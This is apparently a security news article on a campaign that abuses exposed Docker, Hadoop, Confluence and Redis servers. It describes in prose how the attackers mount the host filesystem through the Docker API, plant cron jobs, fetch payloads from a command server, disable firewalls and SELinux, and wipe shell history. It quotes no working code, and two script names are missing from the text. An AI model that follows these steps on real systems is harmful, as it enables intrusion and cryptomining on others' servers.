Attack targets Docker, Hadoop, Confluence, and Redis with new payloads

A new attack campaign is targeting publicly accessible Docker, Hadoop, Confluence, and Redis deployments by exploiting common misconfigurations and known vulnerabilities. The attackers deploy previously unseen payloads including four binaries written in Golang.

“Once initial access is achieved, a series of shell scripts and general Linux attack techniques are used to deliver a cryptocurrency miner, spawn a reverse shell, and enable persistent access to the compromised hosts,” researchers from Cado Security said in a new report. While attribution cannot be made with certainty, the shell scripts observed in the campaign have some similarities to those used in the past by known threat actors TeamTNT and WatchDog.

Complex multi-stage infection chain via shell scripts

The infection chain of this campaign is quite complex totaling over 10 shell scripts and various binaries, multiple persistence mechanisms, backup payload delivery methods, anti-forensics techniques, user mode rootkits, network scanning tools and exploits. Cado first observed the attack on one of its Docker honeypots, which was intentionally configured insecurely. The attackers connected to the Docker Engine API, spawned a new container based on Alpine Linux, and mounted the host’s root file system to a temporary directory inside the container.

This technique is not new and is commonly used in Docker attacks to write a malicious cron job on the host system that would then execute the attackers’ code. In this new campaign, the attackers wrote a file to the /usr/bin/vurl path and created a cron job to execute some base64-encoded shell commands.

The shell code executed by cron uses the vurl script to retrieve a first stage payload from a hardcoded command-and-control server via a TCP connection. If this method fails, a second cron job is created that uses Python and the urllib2 library to retrieve an alternative payload. The vurl payload is a shell script called whose goal is to make sure the chattr (change file attributes) utility is installed and to check if the current account is root. This will determine the next payload, yet another shell script called whose purpose is to prepare the system for the next stages of infection.

First, it uses the ​​netstat command to check if connections on port 80 are allowed to the internet. It then disables the firewalld and iptables Linux firewalls, deletes the shell history to hide its tracks, disables the SELinux protection and addes public DNS servers /etc/resolv.conf to ensure future C2 domains are resolved correctly.

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button